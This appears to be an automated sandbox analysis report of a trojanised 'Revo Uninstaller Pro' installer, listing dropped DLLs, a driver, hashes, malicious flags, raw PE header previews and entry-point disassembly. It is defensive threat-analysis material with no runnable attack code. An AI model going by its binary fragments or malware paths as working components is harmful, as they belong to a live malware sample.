                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..w...w...w...~.h.z...w...-...l(P.u...l(Q.v...l(`.v...l(a.v...l(f.v...Richw...................PE..L.....Eb...........!.....6...........C.......P...............................@............@.........................@`..l....X...........P...................0..L....................................................P...............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data...TX...p.......L..............@....rsrc....P.......R...\..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):5632
                                                                                                                                                                          Entropy (8bit):3.817430038996001
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
                                                                                                                                                                          MD5:549EE11198143574F4D9953198A09FE8
                                                                                                                                                                          SHA1:2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
                                                                                                                                                                          SHA-256:131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
                                                                                                                                                                          SHA-512:0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L....C.f...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):12288
                                                                                                                                                                          Entropy (8bit):5.804946284177748
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                                                          MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                                                          SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                                                          SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                                                          SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 150 x 57 x 24, resolution 2835 x 2835 px/m, cbSize 25818, bits offset 54
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25818
                                                                                                                                                                          Entropy (8bit):2.1654611461266877
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:qfsz6YadoZ+HPwmWxS04WKWEFCidDIaThy:q0zDadRPNW0CICiyaThy
                                                                                                                                                                          MD5:414D457C540048704D144FB2A0D2BC73
                                                                                                                                                                          SHA1:5021B23ABACB37EDC3E099132A9FF83A0AD5E3E9
                                                                                                                                                                          SHA-256:B0537E5F4FE7E8FAC0C093BFB83E7F633EF4F8DA6649F73329EA1B2777956DE2
                                                                                                                                                                          SHA-512:C1B90F31950F3AC5CD65BDDCFCAEFB4A722EC6F91327437734FE05C8989004F2268662DF5631FDB6A6F23E28080BABCBCFBBE112F0EBB3B850D17395484FF355
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:BM.d......6...(.......9.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):9728
Entropy (8bit):5.157714967617029
Encrypted:false
SSDEEP:96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
MD5:B7D61F3F56ABF7B7FF0D4E7DA3AD783D
SHA1:15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
SHA-256:89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
SHA-512:6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):7168
Entropy (8bit):5.295306975422517
Encrypted:false
SSDEEP:96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
MD5:11092C1D3FBB449A60695C44F9F3D183
SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:data
Category:dropped
Size (bytes):174265447
Entropy (8bit):6.912090216931223
Encrypted:false
SSDEEP:3145728:+tPWpEpfvoPWpEpOKKyPWpEpHldLPWpEpQ:+/vKKgldG
MD5:A49C010EA61EBAC352464754FE53D710
SHA1:A0023ABE96D6C4AB70EAE8BB51A88D1EFC841CB1
SHA-256:4DDA9851A5EE98FEB3C219CBA4BF041A92E63AD9E514787D6CC21E0B9693BECA
SHA-512:E43B163C0463966F53299CB74F035EB2BBEED92659A3BE1A66D25275DE893FF6CEAFC716F89EF328B21960D28242A25FD73C1029D8B3CF9E8AB2417617B42EDC
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
File Type:OpenPGP Public Key
Category:dropped
Size (bytes):285348
Entropy (8bit):5.023570673811003
Encrypted:false
SSDEEP:3072:PUuiSzFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:cR6FfYCaqoDfb6mxk2LqHXj3if/Pa
MD5:710A8AFD95641F3BED3A6C5326E16E9C
SHA1:D0E6B03AC7220D70DAB93DD061ED7A2F39125D69
SHA-256:3F64FAC5C5B6BB8E513B7139FA28663E8DBD0ECF9DB5267FD73C7720306005F7
SHA-512:D108A118403C22FC55156075F3D5E48D99DDDE711FD993288197C99E8E997FA52862114BF43727F1A3A3C76837DE73FFED4C8A415879FDCDDFE995F0FA12FD15
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):244224
Entropy (8bit):5.312608585453437
Encrypted:false
SSDEEP:3072:NFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:NFfYCaqoDfb6mxk2LqHXj3if/Pa
MD5:38F2B22967573A872426D05BDC1A1A70
SHA1:ECAE471EB4E515E1006FCE645A82B70C8ACDA451
SHA-256:83005624A3C515E8E4454A416693BA0FBF384FF5EA0E1471F520DFAE790D4AB7
SHA-512:31BC78BB4EFC7C178C2C489B77D890B8806073180FBDD58156907C187CB73B0860701A9A2648DA1DA4930A8934C9A86B60EA5550315AFEBE833A681BCB4368E0
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):12288
Entropy (8bit):5.804946284177748
Encrypted:false
SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
MD5:192639861E3DC2DC5C08BB8F8C7260D5
SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
File Type:data
Category:dropped
Size (bytes):14300
Entropy (8bit):4.054813513864962
Encrypted:false
SSDEEP:192:OIVC/0+JPRZPXiPyNhyv2wBApVYO8Ng8nVTN9QNuD8:TRUDSPyNhyv2wBApVYO8NJpN9QNuD8
MD5:A22BD0673821CB37754076B1A0516C66
SHA1:0B00E3C47A8A6B2141B7D11CD572996481B0D172
SHA-256:289C1968EA37774DA100912E5C7D71AD6454292722F4152899DF0F87F9F9D2AE
SHA-512:E3110784FD815E97EA95ED5F70B37CE6C8A84A22377FCC0A1BF4F93F2CCFC67B5F49A15E29A7EB0AB7CC8EC14C57B193182EB660E306C0A99AC6573539A9B02B
Malicious:false
Process:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):322
Entropy (8bit):5.164336901833222
Encrypted:false
SSDEEP:6:qcdtvvjvAbIQ+q6s25YvtgEgXF1dkrCQHLBUwfjvAbIQ+q6s25YvtgEgXF1dkrCS:njvrvadft2XF1dkrCQHjvadft2XF1dkl
MD5:8A248728B41394BB324D1D9CFC44819F
SHA1:DA4829A2D50E4EA5650A971285A13E9CD7AB8F02
SHA-256:0F02DF9B8CD720309A19EDCF74AEF9F98ED6B6B4119AA0206FF5F577F338A8BF
SHA-512:336BA1CDEA89DFC1756BA3F50C3E77136B9128588960108098ACC4F8BD744A585A877A8D9D10931E67B7A7C3451C2FBCA1246A049AFC19A3C3F276E95842145C
Malicious:false
Preview:[09.12.2024 11:53:03.0955] (VSProjectPro.cpp 501) --- Starting (v.5.3.4) --- cmd line = "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc..[09.12.2024 11:53:17.0279] (VSProjectPro.cpp 501) --- Starting (v.5.3.4) --- cmd line = "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"..
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.732253116120412
Encrypted:false
SSDEEP:96:MppheZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:Mpphe4oAfcZLZcZL1
MD5:F21D9CAD1CCE05F4E854AAF09D1E142C
SHA1:772B73BF20E325DFC00D32F1F6393CC5B50C40E4
SHA-256:D36764887F948DD1A5E98B45148179FAFD510154A633295C89BD2ECCE23668A4
SHA-512:47269883A46E00BA10118287C8403C56A339C824284ACC82956055B2F3D1A0A8F0060641299D6672CA4752F34E2C68C030921E3C71DCC1560411024A8AAB4806
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.7327369289585453
Encrypted:false
SSDEEP:96:MRphFZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:MRphF4oAfcZLZcZL1
MD5:386DBC4C5744877132226A0E46DFB8B5
SHA1:2C82A9C6FCBF3BA525FAD00A3BAE7C75BF1049F3
SHA-256:9C37882AECABC10620771D8A094D004118A9708AA4D9609942A9F9292351935C
SHA-512:106BF2A59E81D4A09AFCD7832B0992881799E6D7A81A69AF7BD055E1CD5D2775E9E7627AD233FA453F9E0AB1BE468B5C2A38A00B9A7845898F85BE5A0D0A0F94
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.7331588122722503
Encrypted:false
SSDEEP:96:MuphFZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:MuphF4oAfcZLZcZL1
MD5:0EC491C41D4B065395C14A5BA488F682
SHA1:5041AF0E4F0E497556B033C0DB5738F0BAD72759
SHA-256:2DD83D2859E67F6E553BA06CFD39FE99C962BE1FDD424C9DE9EED30D0FA58A67
SHA-512:17AF670DBEE99233BC96749E1D4A602ACBBED4E0DC7612451BA57094D9818D945FCDADCC0B1369D11BC0184378F19301847EAA5E6407A4D1B337C48EA8013818
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.732253116120412
Encrypted:false
SSDEEP:96:MppheZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:Mpphe4oAfcZLZcZL1
MD5:F21D9CAD1CCE05F4E854AAF09D1E142C
SHA1:772B73BF20E325DFC00D32F1F6393CC5B50C40E4
SHA-256:D36764887F948DD1A5E98B45148179FAFD510154A633295C89BD2ECCE23668A4
SHA-512:47269883A46E00BA10118287C8403C56A339C824284ACC82956055B2F3D1A0A8F0060641299D6672CA4752F34E2C68C030921E3C71DCC1560411024A8AAB4806
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.732253116120412
Encrypted:false
SSDEEP:96:MppheZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:Mpphe4oAfcZLZcZL1
MD5:F21D9CAD1CCE05F4E854AAF09D1E142C
SHA1:772B73BF20E325DFC00D32F1F6393CC5B50C40E4
SHA-256:D36764887F948DD1A5E98B45148179FAFD510154A633295C89BD2ECCE23668A4
SHA-512:47269883A46E00BA10118287C8403C56A339C824284ACC82956055B2F3D1A0A8F0060641299D6672CA4752F34E2C68C030921E3C71DCC1560411024A8AAB4806
Malicious:false
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.732253116120412
Encrypted:false
SSDEEP:96:MppheZ3Cxk5EkvhkvCCtfcZLqHMcZLqHK:Mpphe4oAfcZLZcZL1
MD5:F21D9CAD1CCE05F4E854AAF09D1E142C
SHA1:772B73BF20E325DFC00D32F1F6393CC5B50C40E4
SHA-256:D36764887F948DD1A5E98B45148179FAFD510154A633295C89BD2ECCE23668A4
SHA-512:47269883A46E00BA10118287C8403C56A339C824284ACC82956055B2F3D1A0A8F0060641299D6672CA4752F34E2C68C030921E3C71DCC1560411024A8AAB4806
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 03:58:00 2024, mtime=Mon Dec 9 15:53:06 2024, atime=Mon Dec 2 03:58:00 2024, length=25576112, window=hide
Category:dropped
Size (bytes):1158
Entropy (8bit):4.487432544389539
Encrypted:false
SSDEEP:24:8msdJNXolNV9Af2KrNRUdo3qAWdo3oww3Bm:8msdJFolP2f2q7Udo3qdo3xwx
MD5:818B1D6815C7B252054CD68D68FAE1BB
SHA1:92C68470F778FB97C9B4E7146E236006150CCDE0
SHA-256:CA1CA038AE12B5BD3E1B20A56FC613427760A88CF24833C2BD4C66A1F9958429
SHA-512:F35217CD9E3A9050EF71ADB8A5AD8C0AEE624DB984719D9715A12639E4050791D325D3F936A5F71E441342AAC71D643AAED9ACD572CE2E0996464318D9FD9BB5
Malicious:false
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 9 15:52:52 2024, mtime=Mon Dec 9 15:52:52 2024, atime=Mon Dec 9 15:52:52 2024, length=179964, window=hide
Category:dropped
Size (bytes):1148
Entropy (8bit):4.509616308195339
Encrypted:false
SSDEEP:12:8m4ICbYX1h9HBdpF4ItNXjN+f7hG2AelYYoYG+jAw4t2XF1dTMbdpmBhG2AwhGwu:8mHdJNXolngYbAN2VEdo3thLdo3oPBm
MD5:01FADDBDE92BD12DB18204AF7B789E49
SHA1:6B1F0BD2A41B285D28E1C7FC1764CAE46F29C028
SHA-256:0B146127338CF15DA90B6706CD81A3774E56059193CC27723150146A92D2CEB7
SHA-512:765DDF343F9A76114D1E14BA78AD51AF7628E51E758331D39B302CB6FC0EEAF1486F4D1621A2DC0CABD1D88CA4E928DF0D8672D36AEA66247F54E23AEEA71331
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
File Type:data
Category:dropped
Size (bytes):40
Entropy (8bit):3.3454618442383204
Encrypted:false
SSDEEP:3:FkWXlAx1H:9ATH
MD5:F1EB47FC602AD555F893959A83D17A2D
SHA1:568D28B6EC8244685138AB2425DC411F00C21DDD
SHA-256:CE6803614EE9B4E37F45474788752C9AE0C0D5FDD42A821A4C1F4D38ADF462C6
SHA-512:517367311167AFBCDFF9C90D2AACEEB24CEFA1797651C58251624504BD5E2274A800CD11A8D4030BF118A5EAE42659ABCA87B6817065B8894B202341A5F906BF
Malicious:false
Preview:sdPC......................6....A....W."
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Dec 2 03:58:00 2024, mtime=Mon Dec 9 15:52:57 2024, atime=Mon Dec 2 03:58:00 2024, length=25576112, window=hide
Category:dropped
Size (bytes):1122
Entropy (8bit):4.521323255097946
Encrypted:false
SSDEEP:24:8mK/dJNXolNVhAf2Krado3qAWdo3oww3Bm:8mudJFolPyf2qado3qdo3xwx
MD5:154CEE59B2BF7C7A0E84F90CC3A9B3A8
SHA1:751CD73551B6266E3A67C06B182E485760B84ED1
SHA-256:6B1181FC888E544F0804B5B1CE2BDEC176B5D66D54F05F238B69D733C1ED6CDC
SHA-512:0D2E2BEC97C9F6365817BA74A8A5B97FB788294400AA371867AC4B8C03FCE3E7531D3260DAB76FE34B76E8F9E6CB0702E51CE02D14F36C37FE4AB706973196E9
Malicious:false
                                                                                                                                                                          Preview:L..................F.... ....<..vD...)|.ZJ...<..vD...B...........................P.O. .:i.....+00.../C:\.....................1......Y....PROGRA~1..t......O.I.Y......B...............J.....\d..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....d.1......Y....VSREVO~1..L......Y...Y............................\d..V.S. .R.e.v.o. .G.r.o.u.p.....r.1......Y....REVOUN~1..Z......Y...Y......3.........................R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....l.2..B...Y@' .REVOUN~2.EXE..P......Y@'.Y................................R.e.v.o.U.n.i.n.P.r.o...e.x.e.......r...............-.......q....................C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe..I.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.\.R.e.v.o.U.n.i.n.P.r.o...e.x.e.3.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.V.S. .R.e.v.o. .G.r.o.u.p.\.R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.`.......X.......927537...........hT..CrF.f4...
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2227280
                                                                                                                                                                          Entropy (8bit):7.916292558024388
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:mVAbw0dQH5x+E1Q9AA06OT9S7+rICzXNagRt532Z8JtS:iAJdi3+ZN06+Nzdn5w8i
                                                                                                                                                                          MD5:5A1105F1C25A60B128D45EC03041BF48
                                                                                                                                                                          SHA1:DCCC4587FB20170B8014DEB61A7C371FAC15ED01
                                                                                                                                                                          SHA-256:C2A58EFE4CDD4CD48A9C2F77CBA4BC0898F0A5953F6065C2D270A8A1DC7A8FCD
                                                                                                                                                                          SHA-512:9058164DCD3B802268DC8D5EC916A53976CF17CF6A4D4F5BE9626B91DDAED7AE159E009E90E0FBF0D1E16CD4C00C4D9268FF67D2F5D43037002D91E4C4017D48
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N....m...m...m..A....m..A....m...._m.....m.....m..A....m..A....m...m...m....\m....X..m...m0..m.....m..Rich.m..........PE..L.....if...............'..........................@..................................5"...@.................................H...d.......p.............!..+.......1...C...............................C..@...............0............................text............................... ..`.rdata..z...........................@..@.data....K..........................@....rsrc...p...........................@..@.reloc...1.......2..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                          Entropy (8bit):6.303083119559888
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                                                          MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                                                          SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                                                          SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                                                          SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32
                                                                                                                                                                          Entropy (8bit):3.4772170014624826
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:alXtRBXFIvCOt:aldTXFcz
                                                                                                                                                                          MD5:B8F4AE17649F67195291A85DE16B561D
                                                                                                                                                                          SHA1:1800356941EAFADF247EA9932A02FFEC6C4E4B4C
                                                                                                                                                                          SHA-256:0FD98AA12C34794DABD32375F4B14B207D4840359AB571D278D2ED490BDDE75A
                                                                                                                                                                          SHA-512:F640756A1233CC9596AA273C2A4A0296D7F87788486956F8319C4521F27957201DCBA805A7D994B3EAA12249645D5A4B28134C91FE3A4062891612115A941DAC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:........:Installer message:.....
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                          Entropy (8bit):7.999566849269054
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          File size:22'221'229 bytes
                                                                                                                                                                          MD5:881464f03502d44e29e5fea8b4c35538
                                                                                                                                                                          SHA1:8d2337cd5d72f43415e1d8ffb352a85d3374dd1c
                                                                                                                                                                          SHA256:2a789deb64dd90261f2833d4da0d9f617f2a37ce49ecfa085f5dd43725795a1f
                                                                                                                                                                          SHA512:11db58ebb0f053721c2f4125fa60503a860df5aca55db942608aa42266d07904f5d0f595e34d746370bc9391014b34813c24fb2b2d904c12b1840d97fd4c6479
                                                                                                                                                                          SSDEEP:393216:ErPY1+m1GCcgxv4sV3krTPLt3kkNmE3SgH4J2Nd7R4mPJi5nwMEFAEcd7TJPYItE:ErGcgxwsVATPL9nm4H4kNgkFKnHQrrR
                                                                                                                                                                          TLSH:A527335E911031E4EB528BF0FBB6DE6452EF2022C6F07D5F2C55779ED48049AAEA4C0B
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@.
                                                                                                                                                                          Icon Hash:492da5c5a55ad676
                                                                                                                                                                          Entrypoint:0x403665
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x66084422 [Sat Mar 30 16:56:02 2024 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:4
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                                                                                                                          Instruction
                                                                                                                                                                          sub esp, 000003F8h
                                                                                                                                                                          push ebp
                                                                                                                                                                          push esi
                                                                                                                                                                          push edi
                                                                                                                                                                          push 00000020h
                                                                                                                                                                          pop edi
                                                                                                                                                                          xor ebp, ebp
                                                                                                                                                                          push 00008001h
                                                                                                                                                                          mov dword ptr [esp+20h], ebp
                                                                                                                                                                          mov dword ptr [esp+18h], 0040A230h
                                                                                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                                                                                          call dword ptr [004080A0h]
                                                                                                                                                                          mov esi, dword ptr [004080A4h]
                                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                                          push eax
                                                                                                                                                                          mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                          mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                          mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                          mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                          call esi
                                                                                                                                                                          test eax, eax
                                                                                                                                                                          jne 00007FADA8ACA31Ah
                                                                                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                                                                                          mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                          push eax
                                                                                                                                                                          call esi
                                                                                                                                                                          mov ax, word ptr [esp+48h]
                                                                                                                                                                          mov ecx, dword ptr [esp+62h]
                                                                                                                                                                          sub ax, 00000053h
                                                                                                                                                                          add ecx, FFFFFFD0h
                                                                                                                                                                          neg ax
                                                                                                                                                                          sbb eax, eax
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
